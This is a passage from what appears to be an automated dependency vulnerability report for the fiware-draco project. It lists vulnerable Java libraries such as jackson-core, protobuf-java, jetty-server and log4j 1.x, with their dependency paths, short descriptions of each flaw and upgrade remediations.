  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-record-serialization-services@1.15.3 com.fasterxml.jackson.dataformat:jackson-dataformat-csv@2.12.5 com.fasterxml.jackson.core:jackson-databind@2.12.5 com.fasterxml.jackson.core:jackson-core@2.12.5
    Remediation: Upgrade to org.apache.nifi:nifi-record-serialization-services@1.22.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-core@3.3.1 org.apache.hadoop:hadoop-hdfs-client@3.3.1 com.fasterxml.jackson.core:jackson-databind@2.12.5 com.fasterxml.jackson.core:jackson-core@2.12.5
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-mongodb-client-service-api@1.15.3 org.apache.nifi:nifi-json-utils@1.15.3 com.fasterxml.jackson.core:jackson-databind@2.12.5 com.fasterxml.jackson.core:jackson-core@2.12.5
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.20.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-jobclient@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-common@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-core@3.3.1 com.fasterxml.jackson.core:jackson-databind@2.12.5 com.fasterxml.jackson.core:jackson-core@2.12.5
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-jobclient@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-common@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-core@3.3.1 org.apache.hadoop:hadoop-hdfs-client@3.3.1 com.fasterxml.jackson.core:jackson-databind@2.12.5 com.fasterxml.jackson.core:jackson-core@2.12.5

Overview

com.fasterxml.jackson.core:jackson-core is a Core Jackson abstractions, basic JSON streaming API implementation

Affected versions of this package are vulnerable to Denial of Service (DoS) due to missing input size validation when performing numeric type conversions. A remote attacker can exploit this vulnerability by causing the application to deserialize data containing certain numeric types with large values, causing the application to exhaust all available resources.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade com.fasterxml.jackson.core:jackson-core to version 2.15.0-rc1 or higher.

References

high severity

Stack-based Buffer Overflow

  • Vulnerable module: com.fasterxml.jackson.core:jackson-core
  • Introduced through: com.fasterxml.jackson.core:jackson-core@2.12.5, org.apache.nifi:nifi-standard-utils@1.15.3 and others

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 com.fasterxml.jackson.core:jackson-core@2.12.5
    Remediation: Upgrade to com.fasterxml.jackson.core:jackson-core@2.15.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-standard-utils@1.15.3 com.fasterxml.jackson.core:jackson-core@2.12.5
    Remediation: Upgrade to org.apache.nifi:nifi-standard-utils@1.22.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-json-utils@1.15.3 com.fasterxml.jackson.core:jackson-databind@2.12.5 com.fasterxml.jackson.core:jackson-core@2.12.5
    Remediation: Upgrade to org.apache.nifi:nifi-json-utils@1.22.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-processor-utils@1.15.3 com.fasterxml.jackson.core:jackson-databind@2.12.5 com.fasterxml.jackson.core:jackson-core@2.12.5
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-record-path@1.15.3 com.fasterxml.jackson.core:jackson-databind@2.12.5 com.fasterxml.jackson.core:jackson-core@2.12.5
    Remediation: Upgrade to org.apache.nifi:nifi-record-path@1.22.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-record-serialization-services@1.15.3 com.fasterxml.jackson.core:jackson-databind@2.12.5 com.fasterxml.jackson.core:jackson-core@2.12.5
    Remediation: Upgrade to org.apache.nifi:nifi-record-serialization-services@1.18.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-standard-utils@1.15.3 com.bazaarvoice.jolt:json-utils@0.1.1 com.fasterxml.jackson.core:jackson-core@2.12.5
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-common@3.3.1 com.fasterxml.jackson.core:jackson-databind@2.12.5 com.fasterxml.jackson.core:jackson-core@2.12.5
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-hdfs-client@3.3.1 com.fasterxml.jackson.core:jackson-databind@2.12.5 com.fasterxml.jackson.core:jackson-core@2.12.5
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-core@3.3.1 com.fasterxml.jackson.core:jackson-databind@2.12.5 com.fasterxml.jackson.core:jackson-core@2.12.5
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-record-serialization-services@1.15.3 com.fasterxml.jackson.dataformat:jackson-dataformat-csv@2.12.5 com.fasterxml.jackson.core:jackson-databind@2.12.5 com.fasterxml.jackson.core:jackson-core@2.12.5
    Remediation: Upgrade to org.apache.nifi:nifi-record-serialization-services@1.22.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-core@3.3.1 org.apache.hadoop:hadoop-hdfs-client@3.3.1 com.fasterxml.jackson.core:jackson-databind@2.12.5 com.fasterxml.jackson.core:jackson-core@2.12.5
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-mongodb-client-service-api@1.15.3 org.apache.nifi:nifi-json-utils@1.15.3 com.fasterxml.jackson.core:jackson-databind@2.12.5 com.fasterxml.jackson.core:jackson-core@2.12.5
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.20.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-jobclient@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-common@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-core@3.3.1 com.fasterxml.jackson.core:jackson-databind@2.12.5 com.fasterxml.jackson.core:jackson-core@2.12.5
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-jobclient@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-common@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-core@3.3.1 org.apache.hadoop:hadoop-hdfs-client@3.3.1 com.fasterxml.jackson.core:jackson-databind@2.12.5 com.fasterxml.jackson.core:jackson-core@2.12.5

Overview

com.fasterxml.jackson.core:jackson-core is a Core Jackson abstractions, basic JSON streaming API implementation

Affected versions of this package are vulnerable to Stack-based Buffer Overflow due to the parse process, which accepts an unlimited input file with deeply nested data. An attacker can cause a stack overflow and crash the application by providing input files with excessively deep nesting.

Remediation

Upgrade com.fasterxml.jackson.core:jackson-core to version 2.15.0-rc1 or higher.

References

high severity

Stack-based Buffer Overflow

  • Vulnerable module: com.google.protobuf:protobuf-java
  • Introduced through: com.google.protobuf:protobuf-java@2.5.0 and org.apache.hadoop:hadoop-client@3.3.1

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 com.google.protobuf:protobuf-java@2.5.0
    Remediation: Upgrade to com.google.protobuf:protobuf-java@3.25.5.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-common@3.3.1 com.google.protobuf:protobuf-java@2.5.0
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-yarn-api@3.3.1 com.google.protobuf:protobuf-java@2.5.0
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.4.1.

Overview

com.google.protobuf:protobuf-java is a Google's language-neutral, platform-neutral, extensible mechanism for serializing structured data.

Affected versions of this package are vulnerable to Stack-based Buffer Overflow via the parsing of nested groups or series of SGROUP tags as unknown fields with DiscardUnknownFieldsParser or Java Protobuf Lite parser, or against Protobuf map fields. An attacker can cause infinite recursion by sending malicious Protocol Buffer data.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade com.google.protobuf:protobuf-java to version 3.25.5, 4.27.5, 4.28.2 or higher.

References

high severity

Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection')

  • Vulnerable module: commons-beanutils:commons-beanutils
  • Introduced through: org.apache.hadoop:hadoop-client@3.3.1

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-common@3.3.1 commons-beanutils:commons-beanutils@1.9.4
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.4.2.

Overview

commons-beanutils:commons-beanutils is a provides an easy-to-use but flexible wrapper around reflection and introspection.

Affected versions of this package are vulnerable to Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection') via the getProperty and getNestedProperty methods of the PropertyUtilsBean class. An attacker can execute arbitrary code by accessing the declaredClass property of Java enum objects, which allows access to the ClassLoader.

Note:

The BeanIntrospector class that can mitigate this vulnerability was added in version 1.9.2 but its usage was not enabled by default.

Remediation

Upgrade commons-beanutils:commons-beanutils to version 1.11.0 or higher.

References

high severity

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: dnsjava:dnsjava
  • Introduced through: org.apache.hadoop:hadoop-client@3.3.1

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-common@3.3.1 dnsjava:dnsjava@2.1.7
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.4.1.

Overview

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling when DNSSEC validation is enabled, due to a flaw in the DNSSEC specification. An attacker can send traffic from a malicious signed domain that occupies excessive CPU on the target system (keytrap).

Remediation

Upgrade dnsjava:dnsjava to version 3.6.0 or higher.

References

high severity

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: dnsjava:dnsjava
  • Introduced through: org.apache.hadoop:hadoop-client@3.3.1

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-common@3.3.1 dnsjava:dnsjava@2.1.7
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.4.1.

Overview

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling when DNSSEC validation is enabled, due to a flaw in the DNSSEC specification. An attacker can flood a resolver with NSEC3 closest encloser proof queries to consume excessive resources and deny service to other users (keytrap).

Remediation

Upgrade dnsjava:dnsjava to version 3.6.0 or higher.

References

high severity

Denial of Service (DoS)

  • Vulnerable module: org.eclipse.jetty:jetty-server
  • Introduced through: org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-server@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.24.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.24.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.24.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-annotations@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.24.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-deploy@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.24.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-annotations@9.4.44.v20210927 org.eclipse.jetty:jetty-plus@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.24.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:apache-jsp@9.4.44.v20210927 org.eclipse.jetty:jetty-annotations@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.24.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:apache-jsp@9.4.44.v20210927 org.eclipse.jetty:jetty-annotations@9.4.44.v20210927 org.eclipse.jetty:jetty-plus@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.24.0.

Overview

org.eclipse.jetty:jetty-server is a lightweight highly scalable java based web server and servlet engine.

Affected versions of this package are vulnerable to Denial of Service (DoS) via the ThreadLimitHandler.getRemote() method. An attacker can exhaust the server's memory and trigger OutofMemory errors by repeatedly sending crafted requests.

Workaround

This vulnerability can be mitigated by not using ThreadLimitHandler and considering the use of QoSHandler instead to artificially limit resource utilization.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade org.eclipse.jetty:jetty-server to version 9.4.56, 10.0.24, 11.0.24, 12.0.9 or higher.

References

high severity

Deserialization of Untrusted Data

  • Vulnerable module: log4j:log4j
  • Introduced through: org.slf4j:slf4j-log4j12@1.7.32

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.slf4j:slf4j-log4j12@1.7.32 log4j:log4j@1.2.17

Overview

log4j:log4j is a 1.x branch of the Apache Log4j project. Note: Log4j 1.x reached End of Life in 2015, and is no longer supported.

Affected versions of this package are vulnerable to Deserialization of Untrusted Data. CVE-2020-9493 identified a deserialization issue that was present in Apache Chainsaw. Prior to Chainsaw V2.0 Chainsaw was a component of Apache Log4j 1.2.x where the same issue exists.

Details

Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like Remote Method Invocation (RMI), Java Management Extension (JMX), Java Messaging System (JMS), Action Message Format (AMF), Java Server Faces (JSF) ViewState, etc.

Deserialization of untrusted data (CWE-502) is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, thus allowing the attacker to control the state or the flow of the execution.

Remediation

There is no fixed version for log4j:log4j.

References

high severity

Deserialization of Untrusted Data

  • Vulnerable module: log4j:log4j
  • Introduced through: org.slf4j:slf4j-log4j12@1.7.32

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.slf4j:slf4j-log4j12@1.7.32 log4j:log4j@1.2.17

Overview

log4j:log4j is a 1.x branch of the Apache Log4j project. Note: Log4j 1.x reached End of Life in 2015, and is no longer supported.

Affected versions of this package are vulnerable to Deserialization of Untrusted Data. JMSSink in all versions of Log4j 1.x is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration or if the configuration references an LDAP service the attacker has access to. The attacker can provide a TopicConnectionFactoryBindingName configuration causing JMSSink to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-4104.

Note: this issue only affects Log4j 1.x when specifically configured to use JMSSink, which is not the default.

Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.

Details

Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like Remote Method Invocation (RMI), Java Management Extension (JMX), Java Messaging System (JMS), Action Message Format (AMF), Java Server Faces (JSF) ViewState, etc.

Deserialization of untrusted data (CWE-502) is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, thus allowing the attacker to control the state or the flow of the execution.

Remediation

There is no fixed version for log4j:log4j.

References

high severity

SQL Injection

  • Vulnerable module: log4j:log4j
  • Introduced through: org.slf4j:slf4j-log4j12@1.7.32

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.slf4j:slf4j-log4j12@1.7.32 log4j:log4j@1.2.17

Overview

log4j:log4j is a 1.x branch of the Apache Log4j project. Note: Log4j 1.x reached End of Life in 2015, and is no longer supported.

Affected versions of this package are vulnerable to SQL Injection. By design, the JDBCAppender in Log4j 1.2.x accepts an SQL statement as a configuration parameter where the values to be inserted are converters from PatternLayout. The message converter, %m, is likely to always be included. This allows attackers to manipulate the SQL by entering crafted strings into input fields or headers of an application that are logged allowing unintended SQL queries to be executed.

Note: this issue only affects Log4j 1.x when specifically configured to use the JDBCAppender, which is not the default.

Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions. Beginning in version 2.0-beta8, the JDBCAppender was re-introduced with proper support for parameterized SQL queries and further customization over the columns written to in logs.

Remediation

There is no fixed version for log4j:log4j.

References

high severity

Infinite loop

  • Vulnerable module: org.apache.commons:commons-compress
  • Introduced through: org.apache.avro:avro@1.8.1, org.apache.nifi:nifi-flowfile-packager@1.15.3 and others

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.avro:avro@1.8.1 org.apache.commons:commons-compress@1.21
    Remediation: Upgrade to org.apache.avro:avro@1.11.4.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-flowfile-packager@1.15.3 org.apache.commons:commons-compress@1.21
    Remediation: Upgrade to org.apache.nifi:nifi-flowfile-packager@1.26.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-avro-record-utils@1.15.3 org.apache.avro:avro@1.8.1 org.apache.commons:commons-compress@1.21
    Remediation: Upgrade to org.apache.nifi:nifi-avro-record-utils@1.28.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-database-utils@1.15.3 org.apache.avro:avro@1.8.1 org.apache.commons:commons-compress@1.21
    Remediation: Upgrade to org.apache.nifi:nifi-database-utils@1.28.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-record-serialization-services@1.15.3 org.apache.avro:avro@1.8.1 org.apache.commons:commons-compress@1.21
    Remediation: Upgrade to org.apache.nifi:nifi-record-serialization-services@1.28.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-common@3.3.1 org.apache.commons:commons-compress@1.21
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.4.1.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-database-utils@1.15.3 org.apache.nifi:nifi-avro-record-utils@1.15.3 org.apache.avro:avro@1.8.1 org.apache.commons:commons-compress@1.21
    Remediation: Upgrade to org.apache.nifi:nifi-database-utils@1.28.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-record-serialization-services@1.15.3 org.apache.nifi:nifi-avro-record-utils@1.15.3 org.apache.avro:avro@1.8.1 org.apache.commons:commons-compress@1.21
    Remediation: Upgrade to org.apache.nifi:nifi-record-serialization-services@1.28.0.

Overview

org.apache.commons:commons-compress is an API for working with compression and archive formats.

Affected versions of this package are vulnerable to Infinite loop due to the improper handling of certain inputs during the parsing of dump files. An attacker can cause the application to enter an infinite loop by supplying crafted inputs.

Remediation

Upgrade org.apache.commons:commons-compress to version 1.26.0 or higher.

References

high severity

Arbitrary Code Execution

  • Vulnerable module: org.apache.commons:commons-text
  • Introduced through: org.apache.nifi:nifi-flowfile-packager@1.15.3, org.apache.nifi:nifi-record-serialization-services@1.15.3 and others

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-flowfile-packager@1.15.3 org.apache.commons:commons-text@1.8
    Remediation: Upgrade to org.apache.nifi:nifi-flowfile-packager@1.19.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-record-serialization-services@1.15.3 org.apache.commons:commons-text@1.8
    Remediation: Upgrade to org.apache.nifi:nifi-record-serialization-services@1.19.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-common@3.3.1 org.apache.commons:commons-text@1.8
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.3.5.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-security-utils@1.15.3 org.apache.commons:commons-configuration2@2.7 org.apache.commons:commons-text@1.8
    Remediation: Upgrade to org.apache.nifi:nifi-security-utils@1.16.1.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-avro-record-utils@1.15.3 org.apache.nifi:nifi-standard-record-utils@1.15.3 org.apache.commons:commons-text@1.8
    Remediation: Upgrade to org.apache.nifi:nifi-avro-record-utils@1.19.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-database-utils@1.15.3 org.apache.nifi:nifi-standard-record-utils@1.15.3 org.apache.commons:commons-text@1.8
    Remediation: Upgrade to org.apache.nifi:nifi-database-utils@1.19.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-common@3.3.1 org.apache.commons:commons-configuration2@2.7 org.apache.commons:commons-text@1.8
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.4.1.
